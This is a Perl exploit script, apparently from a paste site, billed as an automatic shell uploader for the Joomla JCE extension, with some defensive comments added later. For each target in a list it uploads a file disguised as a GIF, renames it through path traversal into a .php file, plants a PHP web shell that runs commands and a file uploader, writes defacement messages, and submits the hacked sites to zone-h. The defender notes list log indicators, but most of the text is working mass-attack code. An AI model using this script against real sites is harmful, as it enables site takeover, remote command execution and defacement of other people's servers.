
Untitled

a guest
May 2nd, 2016
  1. #!/usr/bin/perl -W
  2.  
  3. use Socket;
  4. use IO::Socket;
  5. use IO::Socket::INET;
  6. use LWP::UserAgent;
  7. use HTTP::Request::Common qw(POST);
  8. use HTTP::Request::Common qw(GET);
  # Setup for a run against the Joomla JCE editor extension (see the banner
  # printed below). Defender note: the fixed, dated User-Agent string set here
  # is sent with every LWP request this script makes and is repeated verbatim
  # in its raw-socket requests, so it is a usable indicator in access logs.
  9. $ag = LWP::UserAgent->new();
  10. $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  11. $ag->timeout(10);
  12. #Recoded by No\One
  13. #print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
  14. #print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n";
  15.  
  # $a becomes the script's own name: the part of $0 after the last backslash
  # when $0 contains one, otherwise $0 unchanged. It is only used in messages.
  16. if($0 =~ /^(.*)\\(.+)$/){chomp($a = $2);}else{chomp($a = $0);}
  17.  
  # Print the usage text and stop when no argument was given.
  18. if(!defined($ARGV[0])) { print "\n * Modo de usar => $a lista.txt ou $a -s www.site.com.br \n"; exit; }
  19.  
  # Two input modes: "-s HOST" puts a single entry in @TXT; otherwise the first
  # argument is read as a file with one entry per line. The two-argument open()
  # is not checked for failure.
  20. $TXT = $ARGV[0]; if($TXT eq "-s"){@TXT = $ARGV[1]; $aq = $ARGV[1];
  21. if(!defined($ARGV[1])) { print "\n\n * Modo de usar => $a lista.txt ou $a -s www.site.com\n\n"; exit; }
  22. }else{open(TXT,"<$TXT"); chomp(@TXT=<TXT>); close(TXT); $aq = $ARGV[0];}
  # $tx is the number of entries; it is shown in the progress title later on.
  23. $tx = $#TXT+1;
  24. print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.2 .::.\n\n";
  25.  
  # Counters for zone-h submissions that were accepted ($ok) or rejected ($erro).
  26. $ok = '0'; $erro = '0';
  # Per-entry loop. For each entry it (1) checks that the JCE image-manager
  # endpoint answers, (2) uploads content under a .gif name, (3) asks the plugin
  # to rename that file to another path and extension, (4) probes for the
  # resulting files, and (5) reports a defaced page to zone-h.
  # Mitigation (general): keep the JCE extension current and configure the web
  # server so that images/, tmp/ and cache/ never execute PHP.
  27. site: foreach(@TXT){ chomp(my $site = $_);
  28. $cm=''; $porra = '0';
  # Split the entry into a host part ($site) and an optional sub-directory
  # ($cm). The scheme is discarded: $http and $porta below are always
  # 'http://' and 80, so every request this script sends is cleartext HTTP.
  29. if($site =~ /http:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
  30. }elsif($site =~ /http:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
  31. }elsif($site =~ /https:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
  32. }elsif($site =~ /https:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
  33. }elsif($site =~ /http:\/\/(.*)\//){$site = $1;
  34. }elsif($site =~ /http:\/\/(.*)/){$site = $1;
  35. }elsif($site =~ /https:\/\/(.*)\//){$site = $1;
  36. }elsif($site =~ /https:\/\/(.*)/){$site = $1;
  37. }elsif($site =~ /(.*)\/(.*)\//){$site = $1; $cm = $2;
  38. }elsif($site =~ /(.*)\/(.*)/){$site = $1; $cm = $2;
  39. }elsif($site =~ /(.*)\//){$site = $1;}
  40.  
  41. $http = 'http://'; $porta = "80";
  42.  
  # Defender note: these two query strings are the request signatures to search
  # for in web-server access logs (option=com_jce, plugin=imgmanager,
  # file=imgmanager, with either version=1576&cid=20 or method=form&cid=20 and
  # the fixed 32-hex-character parameter pair).
  43. $script = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20';
  44. $up = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b';
  45.  
  46. print "\n>> $site ->";
  47. $cs++;
  # Progress display: runs `title ...` through the shell on the operator's own
  # machine. $a and $aq come from $0 and the command line.
  48. system "title $a $aq - [ $cs\/$tx ] =-= Zone-H [ OK ($ok) ~ ERRO ($erro) ]";
  49. ############################################### Packet 1 --> checking misses
  # When the entry had a sub-directory, both endpoint paths are prefixed with it.
  50. if($cm){ $script = '/'."$cm"."$script"; $up = '/'."$cm"."$up"; }
  51.  
  # Fetch the image-manager page; the entry is skipped (" [!]") unless the
  # response contains one of the three markers in the pattern.
  52. $pageURL= "$http"."$site"."$script";
  53. $getp = $ag->request(HTTP::Request->new(GET => $pageURL));
  54. $get = $getp->content;
  55. if($get !~ m/multipart\/form-data|hastip|\/plugins\/editors\/jce\//g){ print " [!]"; next site;}
  56.  
  # Rename destinations tried for each entry. The ../ components are relative
  # paths that presumably climb out of the directory the upload lands in --
  # TODO confirm against the extension's upload root. Defender note: these file
  # names (xk.txt, xh.txt, ck.htm, x.html, xxx.php, xxu.php, x.php) are worth
  # searching for on a site suspected of being hit by this script.
  57. my @index = (
  58. '../../xk.txt',
  59. '../../xh.txt',
  60. '../../ck.htm',
  61. '../../tmp/x.html',
  62. '../../cache/x.html',
  63. '../x.html',
  64. '../../tmp/ck.htm',
  65. '../../cache/ck.htm',
  66. '../ck.htm',
  67. '../xxx.php',
  68. '../xxu.php');
  69.  
  70. if($cm){push(@index,'../../../x.htm','../../../x.html','../../../x.php','../../../xk.txt','../../../xh.txt','../../../ck.htm');}
  71.  
  72. push(@index,'../../x.php','../../x.php');
  73.  
  74. foreach(@index){
  75. chomp(my $indx = $_);
  76. $porra++;
  77.  
  # Pick the temporary upload name ($narq = prefix + counter) and the file
  # content ($cont) from the destination name. Most cases carry a defacement
  # message; the last two put a GIF89a header in front of PHP code so the file
  # is presented as an image. Defender note: a file under the web root that
  # begins with GIF89a and contains "<?php" is a strong compromise indicator.
  78. if($indx =~ /xk/){ $narq = 'arti'."$porra";
  79. $cont = 'Invasão feita por Renatinho';}
  80.  
  81. if($indx =~ /xh/){ $narq = 'not'."$porra";
  82. $cont = 'Invasão feita por Renatinho';}
  83.  
  84. if($indx =~ /configuration/){ $narq = 'clor'."$porra";
  85. $cont = 'Invasão feita por Renatinho<?php exit;?>';}
  86.  
  87. if($indx =~ /index|ck/){ $narq = 'plas'."$porra";
  88. $cont = 'Invasão feita por Renatinho';}
  89.  
  90. if($indx =~ /xxx/){ $narq = 'gligie'."$porra";
  91. $cont = 'GIF89a
  92. <?php system("$_GET[cmd]"); exit; ?>';}
  93.  
  94. if($indx =~ /xxu/){ $narq = 'tir'."$porra";
  95. $cont = 'GIF89a u
  96. <?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>';}
  97.  
  98.  
  99. #print "\n\n $indx - $narq \n$cont \n\n----------------------------------------------";
  100.  
  101.  
  102. ############################################### Packet 2 --> Uploading the content as a .gif
  # Hand-written multipart POST to $up over a raw TCP socket. If the connection
  # fails, the `or ... and next site` chain moves on to the next entry.
  # Defender note: the request is built from fixed values that can be matched
  # in traffic or WAF logs -- the boundary string, "Content-Length: 769", bare
  # "\n" line endings instead of CRLF, and the User-Agent.
  103. $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
  104. print $remote "POST $up HTTP/1.1"."\n";
  105. print $remote "Host: $site"."\n";
  106. print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
  107. print $remote "Content-Type: multipart/form-data; boundary=---------------------------41184676334"."\n";
  108. print $remote "Content-Length: 769"."\n\n";
  109. print $remote "-----------------------------41184676334"."\n";
  110. print $remote 'Content-Disposition: form-data; name="upload-dir"'."\n\n";
  111. print $remote '/'."\n";
  112. print $remote "-----------------------------41184676334"."\n";
  113. print $remote 'Content-Disposition: form-data; name="Filedata"; filename=""'."\n";
  114. print $remote 'Content-Type: application/octet-stream'."\n\n\n";
  115. print $remote "-----------------------------41184676334"."\n";
  116. print $remote 'Content-Disposition: form-data; name="upload-overwrite"'."\n\n";
  117. print $remote "0"."\n";
  118. print $remote "-----------------------------41184676334"."\n";
  119. print $remote 'Content-Disposition: form-data; name="Filedata"; filename="'.$narq.'.gif"'."\n";
  120. print $remote 'Content-Type: image/gif'."\n\n";
  121. print $remote "$cont"."\n";
  122. print $remote "-----------------------------41184676334"."\n";
  123. print $remote 'Content-Disposition: form-data; name="upload-name"'."\n\n";
  124. print $remote "$narq"."\n";
  125. print $remote "-----------------------------41184676334"."\n";
  126. print $remote 'Content-Disposition: form-data; name="action"'."\n\n";
  127. print $remote 'upload'."\n";
  128. print $remote "-----------------------------41184676334--"."\n\n";
  129. close($remote);
  130.  
  131. ############################################### Packet 3 --> Changing the file extension from .gif to .php
  # Second raw POST, this time to $script, with a form body whose json field
  # calls "folderRename" with the uploaded NAME.gif and the destination $indx.
  # The response is never read (the read loop below is commented out).
  # Defender note: a folderRename call whose second argument contains ../ or
  # ends in .php, sent with the "X-Request: JSON" header, is the request to
  # alert on or block.
  132. $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
  133. $json = 'json={"fn":"folderRename","args":["'.$narq.'.gif","'.$indx.'"]}';
  134. print $remote "POST $script HTTP/1.1"."\n";
  135. print $remote "Host: $site"."\n";
  136. print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
  137. print $remote 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'."\n";
  138. print $remote 'X-Request: JSON'."\n";
  139. print $remote "Content-Length: ".length($json).""."\n\n";
  140. print $remote "$json"."\n\n";
  141. #while(<$remote>){print "$_";}
  142. close($remote);
  143. }
  144. ############################################### Packet 4 --> Checking the upload result
  # Request the two PHP file names under /images/ (and under the sub-directory
  # when there is one). Any URL whose response contains "GIF89a" is appended to
  # SH.txt in the working directory.
  145. my @xxx=('/images/xxu.php','/images/xxx.php');
  146. if($cm){ push(@xxx,'/'."$cm".'/images/xxu.php','/'."$cm".'/images/xxx.php'); }
  147. foreach(@xxx){
  148. $shc = 'http://'."$site"."$_";
  149. my $resc=$ag->request(HTTP::Request->new(GET => $shc));
  150. $respc = $resc->content;
  151. if($respc =~ m/GIF89a/g){ open(SHU,">>SH.txt"); print SHU "$shc\n"; close(SHU); } }
  152.  
  # Candidate pages checked for the marker string "KkK1337"; the first page
  # that contains it is treated as a defacement of this entry.
  153. my @indxs = ('/','/ck.htm','/xk.txt','/xh.txt','/tmp/','/cache/','/images/','/tmp/ck.htm','/cache/ck.htm','/images/ck.htm');
  154. if($cm){
  155. push(@indxs,'/'."$cm".'/','/'."$cm".'/ck.htm','/'."$cm".'/xk.txt','/'."$cm".'/xh.txt','/'."$cm".'/tmp/','/'."$cm".'/cache/','/'."$cm".'/images/','/'."$cm".'/tmp/ck.htm','/'."$cm".'/cache/ck.htm','/'."$cm".'/images/ck.htm')}
  156.  
  157. foreach(@indxs){ chomp(my $iind = $_);
  158.  
  159. $urst = 'http://'."$site"."$iind";
  160. my $res=$ag->request(HTTP::Request->new(GET => $urst));
  161. $resp = $res->content;
  # On a hit: post the URL to zone-h's notify form over a raw socket, count the
  # submission as OK or ERRO depending on whether the reply contains "ERROR:",
  # append the URL to HCKDS.txt, and continue with the next entry.
  162. if($resp =~ m/KkK1337/g){ $sthckd = "$site"."$iind";
  163. $sockz = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => "80", Proto => "tcp") or next;
  164. print $sockz "POST /notify/single HTTP/1.0\r\n";
  165. print $sockz "Accept: */*\r\n";
  166. print $sockz "Referer: http://www.zone-h.org/notify/single\r\n";
  167. print $sockz "Accept-Language: pt-br\r\n";
  168. print $sockz "Content-Type: application/x-www-form-urlencoded\r\n";
  169. print $sockz "Connection: Keep-Alive\r\n";
  170. print $sockz "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801\r\n";
  171. print $sockz "Host: www.zone-h.org\r\n";
  172. $length=length("defacer=KkK1337&domain1=http%3A%2F% 2F$sthckd&hackmode=17&reason=1");
  173. print $sockz "Content-Length: $length\r\n";
  174. print $sockz "Pragma: no-cache\r\n";
  175. print $sockz "\r\n";
  176. print $sockz "defacer=KkK1337&domain1=http%3A%2F%2F$sthckd&hackmode=17&reason=1\r\n";
  177. $zn = join('',<$sockz>);
  178. if($zn =~ m/ERROR:/g){print " [ Zone-H ] ".$http.$sthckd." [ ERRO ]"; $erro++;}else{print " [ Zone-H ] ".$http.$sthckd." [ OK ]"; $ok++;}
  179. close($sockz);
  180. open(HCKDS,">>HCKDS.txt"); print HCKDS "$http"."$sthckd\n"; close(HCKDS);
  181. $sthckd = ''; $hk++; next site;}
  182. } }
  183.  
  # End-of-run summary: unset or false counters are set to 0, and the totals
  # line is printed only when at least one entry was recorded in $hk.
  184. if(!$hk){$hk=0;}if(!$ok){$ok=0;}if(!$erro){$erro=0;}
  185. if($hk){
  186. print "\n\n [ Total Hacked -> $hk -#- Success sended Zone-h -> $ok -#- Error sended to Zone-h -> $erro ]\n\n";}